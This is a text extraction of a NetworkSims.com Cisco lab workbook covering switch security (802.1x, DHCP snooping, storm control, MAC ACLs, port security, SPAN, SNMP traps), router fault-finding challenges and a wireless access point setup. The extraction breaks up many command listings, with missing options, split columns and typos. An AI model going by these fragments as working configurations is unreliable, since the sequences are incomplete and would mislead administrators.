Outline
Objectives
Define Tacacs+.
Example
NetworkSims.com
304
> enable
# config t

Outline
This challenge involves the configuration of security of a switch based on 802.1x.
Objectives
Define AAA.
Define port authentication.
Example
> enable
# config t
(config)# aaa authentication dot1x default group radius
(config)# int fa0/1
default
guest-vlan
Configure Guest-vlan on this interface
host-mode
max-req
Max No.of Retries
port-control
timeout
Various Timeouts
(config-if)# dot1 port-control ?
auto
force-authorized
(config-if)# exit
(config)# exit
# sh dot1x all
Sysauthcontrol
= Disabled
Dot1x Protocol Version
= 1
Dot1x Oper Controlled Directions = Both
Dot1x Admin Controlled Directions = Both
# sh dot1x all
NetworkSims.com
305
Dot1x Info for interface FastEthernet0/1

---------------------------------------------------Supplicant MAC <Not Applicable>
AuthSM State
= N/A
BendSM State
= N/A
PortStatus
= N/A
MaxReq
= 2
HostMode
= Single
Port Control
= Auto
QuietPeriod
= 60 Seconds
Re-authentication = Disabled
ReAuthPeriod
= 3600 Seconds
ServerTimeout
= 30 Seconds
SuppTimeout
= 30 Seconds
TxPeriod
= 30 Seconds
Guest-Vlan
= 0
# sh dot1x stat interface fa0/1
PortStatistics Parameters for Dot1x
-------------------------------------------TxReqId = 0
TxReq = 0
TxTotal = 0
RxStart = 0
RxLogoff = 0
RxRespId = 0
RxResp = 0
RxInvalid = 0
RxLenErr = 0
RxTotal= 0
RxVersion = 0
LastRxSrcMac 0000.0000.0000

Outline
Objectives
Enable 802.1x.
Example
> en
# config t
(config)# int fa0/1
default
host-mode
max-req
Max No.of Retries
port-control
timeout
Various Timeouts
NetworkSims.com
306

auto
force-authorized
<cr>
(config-if)# dot1 t ?
quiet-period
reauth-period
initiated
supp-timeout
tx-period
(config-if)# dot1 t r ?

Outline
This challenge involves defending against an attacker depleting the DHCP pool using
DHCP snooping.
Objectives
Enable DHCP snooping.

Apply DHCP snooping on an interface.
Example
> en
# config t
Switch(config)# ip dhcp ?
conflict
database
excluded-address
ping
pool
relay
smart-relay
snooping
NetworkSims.com

DHCP Snooping
307
Switch(config)# ip dhcp snooping ?

information DHCP Snooping information
vlan
DHCP Snooping vlan
<cr>
Switch(config)# ip dhcp snooping
Switch(config)# ip dhcp snooping vlan ?
<1-4094> DHCP Snooping vlan first number
Switch(config)# ip dhcp snooping vlan 4
Switch(config-if)# ip dhcp ?
snooping DHCP Snooping
Switch(config-if)# ip dhcp snooping ?
limit DHCP Snooping limit
trust DHCP Snooping trust config
Switch(config-if)# ip dhcp snooping trust
Switch(config-if)# ip dhcp snooping limit ?
rate DHCP Snooping limit
Switch(config-if)# ip dhcp snooping limte rate ?
<1-4294967294> DHCP snooping rate limit
Switch(config-if)# ip dhcp snooping limte rate 30

Outline
This challenge involves the setting up storm control
Objectives
Enable storm control
Example
> enable
Switch# config t
Switch(config)# int vlan 1
Switch(config-vlan)# ip address 1.2.3.4 255.0.0.0
Switch(config-vlan)# exit
Switch(config-if)# storm-control ?
broadcast Broadcast address storm control
multicast Multicast address storm control
unicast
Unicast address storm control
Switch(config-if)# storm-control multicast ?
level Set storm suppression level on this interface
Switch(config-if)# storm-control multicast level ?
NetworkSims.com
308
<0 - 100>
Enter Integer part of level as percentage of bandwidth
Switch(config-if)# storm-control multicast level 50

Switch(config-if)# exit
Switch(config)# exit
Switch# sh
Interface
--------Fa0/1
Fa0/2
Fa0/3
Fa0/4
Fa0/5
Fa0/6
Fa0/7
Fa0/8
Fa0/9
Fa0/10
Fa0/11
Fa0/12
Fa0/13
Fa0/14
Fa0/15
Fa0/16
Fa0/17
Fa0/18
Fa0/19
Fa0/20
Fa0/21
Fa0/22
Fa0/23
Fa0/24
Gi0/1
Gi0/2
storm
Filter State
------------inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
Level
------100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
Current
------N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
Switch# sh
Interface
--------Fa0/1
Fa0/2
Fa0/3
Fa0/4
Fa0/5
Fa0/6
Fa0/7
Fa0/8
Fa0/9
Fa0/10
Fa0/11
Fa0/12
Fa0/13
Fa0/14
Fa0/15
Fa0/16
Fa0/17
Fa0/18
Fa0/19
Fa0/20
Fa0/21
Fa0/22
Fa0/23
Fa0/24
storm multi
Filter State
------------Forwarding
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
inactive
Level
------50.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
100.00%
Current
------0.00%
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
N/A
NetworkSims.com
309
Gi0/1
Gi0/2
Switch# sh
Interface
--------Fa0/1
inactive
inactive
stor fa0/1 m
Filter State
------------Forwarding
100.00%
100.00%
N/A
N/A
Level
------50.00%
Current
------0.00%

Outline
This challenge involves the configuration of a MAC ACL.
Objectives
Define a MAC ACL.

Define a host to bar from FA0/1.
Apply the MAC ACL on an interface (FA0/1).
Example
> en
# config t
(config)# mac ?
access-list
Named access-list
address-table Configure the MAC address table
(config)# mac acc ?
extended Extended Access List
(config)# mac acc ex ?
WORD access-list name
(config)# mac acc ex Edinburgh
(config-ext-macl)# ?
Extended MAC Access List configuration commands:
deny
exit
Exit from MAC Named ACL configuration mode
no
permit
(config-ext-macl)# deny ?
H.H.H 48-bit source MAC address
any
any source MAC address
host
(config-ext-macl)# deny host 1.1.1 ?
H.H.H 48-bit destination MAC address
any
any destination MAC address
host
(config-ext-macl)# deny host 1.1.1 any
(config-ext-macl)# permit any any
(config-ext-macl)# exit
(config)# int fa0/1
NetworkSims.com
310
(config-if)# mac ?
access-group MAC access-group configuration commands
(config-if)# mac access-group ?
WORD ACL name
(config-if)# mac access-group Edinburgh ?
in Apply to Ingress
(config-if)# mac acc Edinburgh in
(config-if)# exit
(config)# exit
# show access-list
Extended MAC access list Edinburgh
deny host 1.1.1 any
permit any any

Outline
This challenge involves the configuration of monitors for port spanning.
Objectives
Define monitors for source and destination.
Example
> en
# config t
(config)# monitor ?
session Configure a SPAN session
(config)# monitor session
<1-2> SPAN session number
(config)# monitor session 1 ?
destination SPAN destination interface, VLAN
source
SPAN source interface, VLAN
(config)# monitor session 1 destination ?
interface SPAN destination interface
remote
SPAN destination Remote
(config)# monitor session 1 source interface ?
FastEthernet
GigabitEthernet GigabitEthernet IEEE 802.3z
(config)# monitor session 1 des interface fa0
,
Specify another range of interfaces
Specify a range of interfaces
both Monitor received and transmitted traffic
rx
Monitor received traffic only
NetworkSims.com
311
tx
Monitor transmitted traffic only
<cr>
(config)# monitor session 1 source interface fa0/3
(config)# monitor session 1 destination interface fa0/7
(config)# exit
# sh monitor
Session 1
--------Source Ports:
RX Only:
None
TX Only:
None
Both:
FA0/3
Destination Ports: FA0/7
# config t
(config-if)# exit

Area: Switches MAC address notification traps
Outline
MAC address notification allows the tracking of MAC address activity through SNMP using
a trap which sends information to an SNMP server when there is activity. The trap interval
defines the time that the updates will be send to the SNMP server which can reduce
network traffic when there are a great deal of MAC address activity.
Objectives
Define MAC address notification traps.

Define notification details.

# config t
(config)# snmp-server host 1.2.3.4
(config)# snmp-server enable traps mac-notification
(config)# mac address-table notification
(config)# mac address-table notification interval 60
(config)# mac address-table notification history-size 160
(config)# int fa0/6
(config-if)# snmp trap mac-notification added
Example
NetworkSims.com
312
# config t
(config)# snmp-server host 1.2.3.4
chassis-id
community
contact
enable
engineID
group
host
ifindex
inform
ip
IP ToS configuration for SNMP traffic
location
manager
packetsize
queue-length
system-shutdown
trap
SNMP trap options
trap-source
trap-timeout
user
view
traps
Enable SNMP Traps
(config)# snmp-server enable traps ?
bridge
Enable SNMP STP Bridge MIB traps
c2900
Enable SNMP c2900 traps
cluster
Enable Cluster traps
config
Enable SNMP config traps
entity
Enable SNMP entity traps
envmon
Enable SNMP environmental monitor traps
flash
Enable SNMP FLASH notifications
hsrp
Enable SNMP HSRP traps
mac-notification Enable SNMP MAC Notification traps
port-security
Enable SNMP port security traps
rtr
Enable SNMP Response Time Reporter traps
snmp
Enable SNMP traps
syslog
Enable SNMP syslog traps
vlan-membership
Enable SNMP VLAN membership traps
vlancreate
Enable SNMP VLAN created traps
vlandelete
Enable SNMP VLAN deleted traps
vtp
Enable SNMP VTP traps
<cr>
(config)# snmp-server enable traps mac-notification
(config)# mac ?
access-list
address-table
Named access-list
Configure the MAC address table
(config)# mac address-table ?

aging-time
Set MAC address table entry maximum age
notification Enable/Disable MAC Notification on the switch
static
static keyword
(config)# mac address-table notification ?
history-size Number of MAC notifications to be stored
interval
Interval between the MAC notifications
NetworkSims.com
313
<cr>
(config)# mac address-table notification
(config)# mac address-table notification interval 60
(config)# mac address-table notification history-size 160
(config)# int fa0/6
(config-if)# snmp ?
ifindex Persist ifindex for the interface
trap
Allow a specific SNMP trap
(config-if)# snmp trap ?
link-status
Allow SNMP LINKUP and LINKDOWN traps
mac-notification MAC Address notification for the interface
(config-if)# snmp trap mac-notification ?
added
Enable Mac Address added notification for this port
removed Enable Mac Address removed notification for this port
(config-if)# snmp trap mac-notification added
(config-if)# end
# show mac address-table notification
MAC Notification Feature is Disabled on the switch
Interval between Notification Traps : 60 secs
Number of MAC Addresses Added : 0
Number of MAC Addresses Removed : 0
Number of Notifications sent to NMS : 0
Maximum Number of entries configured in History Table : 120
Current History Table Length : 0
MAC Notification Traps are Disabled
History Table contents
---------------------# sh mac address-table notification interface
MAC Notification Feature is Enabled on the switch
MAC Notification Flags For All Ethernet Interfaces :
---------------------------------------------------Interface
MAC Added Trap MAC Removed Trap
---------------------- ---------------FastEthernet0/1
Disabled
Disabled
FastEthernet0/2
Disabled
Disabled
FastEthernet0/3
Disabled
Disabled
FastEthernet0/4
Disabled
Disabled
FastEthernet0/5
Disabled
Disabled
FastEthernet0/6
Enabled
Disabled
FastEthernet0/7
Disabled
Disabled
FastEthernet0/8
Disabled
Disabled
FastEthernet0/9
Disabled
Disabled
FastEthernet0/10
Disabled
Disabled
FastEthernet0/11
Disabled
Disabled
FastEthernet0/12
Disabled
Disabled
FastEthernet0/13
Disabled
Disabled
FastEthernet0/14
Disabled
Disabled
FastEthernet0/15
Disabled
Disabled
FastEthernet0/16
Disabled
Disabled
FastEthernet0/17
Disabled
Disabled
FastEthernet0/18
Disabled
Disabled
FastEthernet0/19
Disabled
Disabled
FastEthernet0/20
Disabled
Disabled
FastEthernet0/21
Disabled
Disabled
FastEthernet0/22
Disabled
Disabled
FastEthernet0/23
Disabled
Disabled
NetworkSims.com
314
FastEthernet0/24
GigabitEthernet0/1
GigabitEthernet0/2
Disabled
Disabled
Disabled
Disabled
Disabled
Disabled

Area: Switches Secure Addresses
Outline
Secure addresses allow the administrator to define the MAC address of the host which
connects to a certain VLAN and interface to be pre-defined. If it does not match, it will not
be able to connect.
Objectives
Define secure MAC addresses.

# config t
(config)# int fa0/1
(config-if)# switchport
(config-if)# end
mode access
port-security mac-address 1.2.3
mode access
mode access
Example
# config t
(config)# int fa0/1
access
block
broadcast
host
Set port host
mode
multicast
native
trunking mode
nonegotiate
interface
NetworkSims.com
315
priority
protected
pruning
trunk
unicast
voice
<cr>

mode
(config-if)# switchport port-security ?

aging
maximum
Max secure addrs
violation
<cr>
(config-if)# switchport port-security mac-address ?
H.H.H
48 bit mac address
(config-if)#
(config-if)#
(config-if)#
(config-if)#
(config-if)#
switchport port-security mac-address 1.2.3

int fa0/2
int fa0/3
# show port-security interface fa0/1

Port Security
: Enabled
Port Status
: Secure-down
Violation Mode
: Shutdown
Aging Time
: 0 mins
Aging Type
: Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses
: 1
Total MAC Addresses
: 1
Configured MAC Addresses
: 1
Sticky MAC Addresses
: 0
Last Source Address
: 0000.0000.0000
Security Violation Count
: 0
# sh port-security address
Secure Mac Address Table
------------------------------------------------------------------Vlan
Mac Address
Type
Ports
Remaining Age
(mins)
--------------------------------1
0001.0002.0003
SecureConfigured
Fa0/1
------------------------------------------------------------------Total Addresses in System (excluding one mac per port)
: 0
Max Addresses limit in System (excluding one mac per port) : 5120
Note
The default for the ports might be:
(config-if)# switchport mode dynamic desirable
and thus must be changed to:
NetworkSims.com
316
As, with this, it gives:

(config-if)# switchport port mac 1.2.3
FastEthernet0/x is dynamic port. port-security parameters cannot be set.
If another address is added to an already defined interface gives:

(config-if)# sw port- mac- 1.2.5
Total secure mac-addresses on interface FastEthernet0/x has reached maximum limit.
The number of secure addresses can be changed with the:

switchport port-security maximum x
command

Outline
This challenge involves setting up a static MAC address table.
Objectives
Enable static MAC address table.

Show the MAC address table.
Example
> en
# config t
(config)# mac ?
access-list
address-table
Named access-list
Configure the MAC address table
(config)# mac address-table ?

aging-time
static
static keyword
(config)# mac address-table ageing-time ?
<0-0>
Enter 0 to disable aging
<10-1000000> Aging time in seconds
(config)# mac address-table static ?
H.H.H 48 bit mac address
NetworkSims.com
317
(config)# mac address-table static 1.1.1 ?

vlan VLAN keyword
(config)# mac address-table static 1.1.1 vlan ?
<1-4094> VLAN id of mac address table
(config)# mac address-table static 1.1.1 vlan 1 ?
drop
drop frames
interface interface
(config)# mac address-table static 1.1.1 vlan 1 int ?
FastEthernet
Port-channel
(config)# mac address-table static 1.1.1 vlan 1 int fa0/1
(config)# exit
# sh mac-address-table
Mac Address Table
------------------------------------------Vlan
---All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
All
Mac Address
----------0012.00b0.2780
0012.00b0.2781
0012.00b0.2782
0012.00b0.2783
0012.00b0.2784
0012.00b0.2785
0012.00b0.2786
0012.00b0.2787
0012.00b0.2788
0012.00b0.2789
0012.00b0.278a
0012.00b0.278b
0012.00b0.278c
0012.00b0.278d
0012.00b0.278e
0012.00b0.278f
0012.00b0.2790
0012.00b0.2791
0012.00b0.2792
0012.00b0.2793
0012.00b0.2794
0012.00b0.2795
0012.00b0.2796
0012.00b0.2797
0012.00b0.2798
0012.00b0.2799
0012.00b0.279a
0100.0c00.0000
0100.0ccc.cccc
0100.0ccc.cccd
0100.0ccd.cdce
0180.c200.0000
0180.c200.0001
0180.c200.0002
NetworkSims.com
Type
-------STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
STATIC
Ports
----CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
318
All
0180.c200.0003
STATIC
CPU
All
0180.c200.0004
STATIC
CPU
All
0180.c200.0005
STATIC
CPU
All
0180.c200.0006
STATIC
CPU
All
0180.c200.0007
STATIC
CPU
All
0180.c200.0008
STATIC
CPU
All
0180.c200.0009
STATIC
CPU
All
0180.c200.000a
STATIC
CPU
All
0180.c200.000b
STATIC
CPU
All
0180.c200.000c
STATIC
CPU
All
0180.c200.000d
STATIC
CPU
All
0180.c200.000e
STATIC
CPU
All
0180.c200.000f
STATIC
CPU
All
0180.c200.0010
STATIC
CPU
1
0001.0001.0001
STATIC
Fa0/1
1
000d.28fb.ebda
DYNAMIC
Gi0/2
1
000d.298e.f359
DYNAMIC
Gi0/1
Total Mac Addresses for this criterion: 51
On a switch, the secure address table holds secure MAC addresses and their associated
ports and VLANs. The command allows a secure address that is forwarded to only one port
per VLAN. Thus:
(config)# mac-address-table static 1.1.1 vlan 1 int fa0/1
Will forward anything for the MAC address of 1.1.1 on VLAN 1 to FA0/1.
An alternative is:
> en
# config t
(config)# mac-address-table
?
ageing-time ?
static ?
static 1.1.1 ?
static 1.1.1 vlan
static 1.1.1 vlan
static 1.1.1 vlan
static 1.1.1 vlan
?
1 ?
1 int ?
1 int fa0/1

Outline
This challenge involves setting up SNMP MAC notification traps.
Objectives
NetworkSims.com
319
Enable a MAC SNMP trap.

Define an interval time.
Apply the trap on an interface.
Example
> en
# config t
Switch(config)# snmp-server host 192.168.0.1
Switch(config)# snmp-server enable traps mac-notification
Switch(config)# mac-address-table notification interval ?
<0-2147483647> Notification interval in seconds
Switch(config)# mac-address-table notification interval 60
Switch(config)# mac-address-table notification history-size ?
<0-500> Number of entries in history table
Switch(config)# mac-address-table notification history-size 100
Switch(config)# interface fastethernet0/1
Switch(config-if)# snmp ?
ifindex Persist ifindex for the interface
trap
Allow a specific SNMP trap
Switch(config-if)# snmp trap ?
link-status
Allow SNMP LINKUP and LINKDOWN traps
mac-notification MAC Address notification for the interface
Switch(config-if)# snmp trap mac-notification ?
added
Enable Mac Address added notification for this port
removed Enable Mac Address removed notification for this port
Switch(config-if)# snmp trap mac-notification added
MAC address notification is used to track whenever a machine connects to the network. In
this case whenever a new MAC address is learned, or one is removed, generates an SNMP
trap. If there are many machines connecting, the traps can be grouped together, and sent at
regular intervals (such as 60 second in the example).
Cisco Switch Test

MLS Optimization and Security
http://networksims.com/s9.html
Cisco Switch Test

NetworkSims.com
320
Final test
http://networksims.com/
NetworkSims.com
321
CCNP (Fault finding)
Fault Challenge 1
Fault:
Incorrect IP address on one of the router ports.
Outline
This topology has ONE fault, trying ping'ing around and perform TRACEROUTE's to find
the faults. The hosts have been setup as:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2
Objectives
Try to use debugging tools, such as ping and traceroute to find the fault, rather than looking
in each of the configurations. WHEN YOU FIND THE FAULT... FIX IT, and TEST THAT IT
WORKS
NetworkSims.com
322
Fault Challenge 2
Fault:
Shutdown ports or Incorrect gateway on hosts
Outline
FAULT: This topology has ONE fault, trying ping'ing around and perform TRACEROUTE's
to find the faults. The hosts have been setup as:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2
Objectives
WORKS.
Fault Challenge 3
NetworkSims.com
323
Fault:
Routing problem: incorrect networks defined for the router.
Outline
This topology has ONE fault, trying ping'ing around and perform TRACEROUTE's to find
the faults. The hosts have been setup as:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2
Objectives
WORKS
Fault Challenge 4
Fault:
Incorrectly applied ACL for ICMP on an incoming port
Outline
NetworkSims.com
324
An ACL which blocks incoming ICMP pings has been added ... find it and remove it. Use
ping and traceroute... The hosts have been setup as:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2
Objectives
ICMP deny has been applied to one of the incoming ports, find it, and remove it. Use PING
and TRACEROUTE.
Fault Challenge 5
Fault:
Incorrectly applied ACL for ICMP on an outgoing port
Outline
An ACL which blocks outgoing ICMP pings has been added ... find it and remove it. Use
ping and traceroute... The hosts have been setup as:
H1- 192.168.0.2
NetworkSims.com
325
H2- 192.168.1.2
H3- 192.168.2.2
Objectives
ICMP deny has been applied to one of the outgoing ports, find it, and remove it. Use PING
and TRACEROUTE.
Fault Challenge 6
Fault:
Break in a connection between devices
Outline
There is a break in a connection between the devices. The hosts have been setup as:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2
NetworkSims.com
326
Objectives
There is a break in a connection between the devices, find it, and remove it. Use PING and
TRACEROUTE. Possible solutions:
Link between Host 1 and R1, E0
Link between R1, S0 and R2, S0
Link between R3, E0 and R5, E0
Link between R4, E0 and R2, E0
Fault Challenge 7
Fault:
A standard ACL which denies H1, H2 or H3 has been applied.
Outline
This topology has an ACL set which bars either H1, H2 or H3, but no other nodes. The
addresses of the nodes are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2
NetworkSims.com
327
Objectives
A standard ACL which denies H1, H2 or H3 has been applied. Use PING and
Acl Deny H1 on R1, E0.
Acl Deny H1 on R4, S0.
Fault Challenge 8
Fault:
An extended ACL which denies a whole subnet
Outline
NetworkSims.com
328
This topology has an extended ACL set which bars a whole subnet which contains either
H1, H2 or H3. The addresses of the nodes are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2
Objectives
This topology has an extended ACL set which bars a whole subnet which contains either
H1, H2 or H3. Use PING and TRACEROUTE. Possible solutions:
Acl R1, E1, where all hosts on the subnet that H1 is on cannot ping a single host: on
H2
H3.
H1.
H3.
H1.
H2.
Fault Challenge 9
NetworkSims.com
329
Fault:
Single IP error
Outline
The devices have been set but there is a fault in one of the IP addresses. As we have a ring
the devices may still give a ping, but the traceroute will give unexpected results. The
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2
The interconnected networks are:

10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.
Objectives
The devices have been set but there is a fault in one of the IP addresses. Use PING and
R1, E0.
R1, S0.
R1, E1.
R2, E0.
R2, E1.
R3, E0.
R3, E1.
R3, S0.
R4, E0.
NetworkSims.com
330
R4, E1.
R4, S0.
R5, S0.
R5, S1.
Note: The IP addresses for the routers have been hidden, so that it is not possible to simply
view the addresses, rather than actually fault-finding.
Fault Challenge 10
Fault:
Port shutdown on a port in the network
Outline
The devices have been set but there is a fault in the status of one of the ports or on the
gateways of the hosts. As we have a ring the devices may still give a ping, but the traceroute
will give unexpected results. The addresses of the nodes are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.
Objectives
One of the ports has been shutdown. Use PING and TRACEROUTE to find it. Possible
solutions:
NetworkSims.com
331
R1, E0.
R1, S0.
R1, E1.
R2, E0.
R2, E1.
R3, E0.
R3, E1.
R3, S0.
R4, E0.
R4, E1.
R4, S0.
R5, S0.
R5, S1.
Note: The IP addresses for the routers have been hidden, so that it is not possible to simply
view the addresses, rather than actually fault-finding.
Fault Challenge 11
Fault:
Routing protocol problems
Outline
The devices have been set but there is a fault in the routing network definition. As we have
a ring the devices may still give a ping, but the traceroute will give unexpected results. Once
you have found the fault, fix it. The addresses of the nodes are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.
NetworkSims.com
332
Objectives
One of the ports has been shutdown. Use PING and TRACEROUTE to find it.
Fault Challenge 12
Fault:
ACL applied on an incoming port for ICMP.
Outline
An ACL which blocks incoming ICMP pings has been added ... find it and remove it. Once
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.
NetworkSims.com
333
Objectives
ICMP deny has been applied to one of the incoming ports, find it, and remove it. Use PING
and TRACEROUTE. Remember as it's a ring you will still be able to ping and traceroute, but
it might take a longer route, as there could be an alterative route. Example solutions:
ICMP Deny applied to incoming port of R1, E0.

ICMP Deny applied to incoming port of R1, S0.
and so on.
Fault Challenge 13
Fault:
An extended ACL applied on an outgoing port.
Outline
An ACL which blocks outgoing ICMP pings has been added ... find it and remove it. Once
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.
NetworkSims.com
334
Objectives
ICMP deny has been applied to one of the outgoing ports, find it, and remove it. Use PING
and TRACEROUTE. Remember as it's a ring you will still be able to ping and traceroute, but
it might take a longer route, as there could be an alterative route. Example solutions:
ICMP Deny applied to outgoing port of R1, E0.

ICMP Deny applied to outgoing port of R1, S0.
and so on.
Fault Challenge 14
Fault:
An ACL which bars one of the hosts.
Outline
This topology has an ACL set which bars either H1, H2 or H3, but no other nodes. Try
ping'ing around and perform TRACEROUTE's to find the ACL. The addresses of the nodes
are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2
NetworkSims.com
335
10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.
Objectives
This topology has an ACL set which bars either H1, H2 or H3, but no other nodes, trying
ping'ing around and perform TRACEROUTE's to find the ACL. Example solutions:

Fault Challenge 15
Fault:
An extended ACL which bars a whole subnet access to a single

host
Outline
This topology has an extended ACL set which bars hosts from a host subnet access to a
single host. The addresses of the nodes are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2
NetworkSims.com
336
10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.
Objectives
single host. Example solutions:
H2. You should be able to ping the port 192.168.1.1 as it only blocks for one
destination.
destination.
destination.
destination.
and so on.
Fault Challenge 16
Fault:
Disabled port on a switch or a router
Outline
This topology has a disabled port on the switch or on the routers. The addresses of the
nodes are:
NetworkSims.com
337
H1- 192.168.0.2
H2- 192.168.1.2
[Gateway: 192.168.0.1]
[Gateway: 192.168.1.1]
and:
R1, E0: 1.2.3.4
R1, E1: 192.168.0.1
R2, E0: 1.2.3.5
R2, E1: 192.168.1.1
R3, E0: 1.2.3.6
R4, E0: 1.2.3.7
R5, E0: 1.2.3.8
Objectives
Switch Port FA0/1.

Switch Port FA0/2.
Switch Port FA0/3.
Switch Port FA0/4.
Switch Port FA0/5.
Switch Port R1 E0.
Switch Port R2 E0.
Switch Port R3 E0.
Switch Port R4 E0.
NetworkSims.com
338
Switch Port R5 E0.

Switch Port R1 E1.
Switch Port R3 E1.
Fault Challenge 17
Fault:
Incorrect assignment of a VLAN
Outline
This topology has one of the switch ports incorrected assigned to the wrong VLAN. The
H1- 192.168.0.2
H2- 192.168.1.2
[Gateway: 192.168.0.1]
[Gateway: 192.168.1.1]
and:
R1, E0: 1.2.3.4
R1, E1: 192.168.0.1
R2, E0: 1.2.3.5
R2, E1: 192.168.1.1
R3, E0: 1.2.3.6
R4, E0: 1.2.3.7
R5, E0: 1.2.3.8
NetworkSims.com
339
Objectives
Switch Port FA0/1 on VLAN 2.

NetworkSims.com
340
Wireless
Cisco Wireless Challenge 1

Outline
This challenge involves the configuration of the BVI interface.
Objectives
Setup the IP address of the BVI interface.

Setup the subnet mask of the BVI interface.
Define the description of the BVI interface.
Enable E0.
Define the description of the E0 port.
Define Ethernet details on the E0 port.
Example
> enable
ap# sh version
Cisco IOS Software, C1200 Software (C1200-K9W7-M), Version 12.3(8)JA, RELEASE SOFTWARE
(fc2)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2006 by Cisco Systems, Inc.
Compiled Mon 27-Feb-06 09:09 by ssearch
ROM: Bootstrap program is C1200 boot loader
BOOTLDR: C1200 Boot Loader (C1200-BOOT-M) Version 12.3(2)JA4, RELEASE SOFTWARE (fc1)
ap uptime is 28 minutes
System returned to ROM by power-on
System image file is "flash:/c1200-k9w7-mx.123-8.JA/c1200-k9w7-mx.123-8.JA"
This product contains cryptographic features and is subject to United
States and local country laws governing import, export, transfer and
use. Delivery of Cisco cryptographic products does not imply
third-party authority to import, export, distribute or use encryption.
Importers, exporters, distributors and users are responsible for
compliance with U.S. and local country laws. By using this product you
agree to comply with applicable laws and regulations. If you are unable
to comply with U.S. and local laws, return this product immediately.
A summary of U.S. laws governing Cisco cryptographic products may be found at:
http://www.cisco.com/wwl/export/crypto/tool/stqrg.html
NetworkSims.com
341
If you require further assistance please contact us by sending email to

export@cisco.com.
cisco AIR-AP1231G-E-K9
(PowerPC405GP) processor (revision A0) with 15038K/1336K
bytes of memory.
Processor board ID FOC101311BH
PowerPC405GP CPU at 196Mhz, revision number 0x0145
Last reset from power-on
1 FastEthernet interface
1 802.11 Radio(s)
32K bytes of flash-simulated non-volatile configuration memory.
Base ethernet MAC Address: 00:17:59:67:5E:9D
Part Number
: 73-8704-11
PCA Assembly Number
: 800-23211-12
PCA Revision Number
: A0
PCB Serial Number
: FOC101311BH
Top Assembly Part Number
: 800-23304-13
Top Assembly Serial Number
: FCZ1019Z0T3
Top Revision Number
: A0
Product/Model Number
: AIR-AP1231G-E-K9
Configuration register is 0xF
ap# sh controller
!
interface Dot11Radio0
Radio AIR-MP21G, Base Address 0017.5ab7.ff60, BBlock version 0.00, Software version
5.90.8
Serial number: FOC1011C7A8
Number of supported simultaneous BSSID on Dot11Radio0: 8
Carrier Set: EMEA (EU )
Uniform Spreading Required: No
Current Frequency: 2417 MHz Channel 2
Allowed Frequencies: 2412(1) 2417(2) 2422(3) 2427(4) 2432(5) 2437(6) 2442(7) 2447(8)
2452(9) 2457(10) 2462(11) 2467(12) 2472(13)
Listen Frequencies: 2412(1) 2417(2) 2422(3) 2427(4) 2432(5) 2437(6) 2442(7) 2447(8)
2452(9) 2457(10) 2462(11) 2467(12) 2472(13) 2484(14)
Current CCK Power: 50 mW
Allowed CCK Power Levels: 1 5 10 20 30 50
Current OFDM Power: 30 mW
Allowed OFDM Power Levels: 1 5 10 20 30
Allowed Client Power Levels: 1 5 10 20 30 50
ERP settings: short slot time.
Neighbors in non-erp mode:
Current Rates:
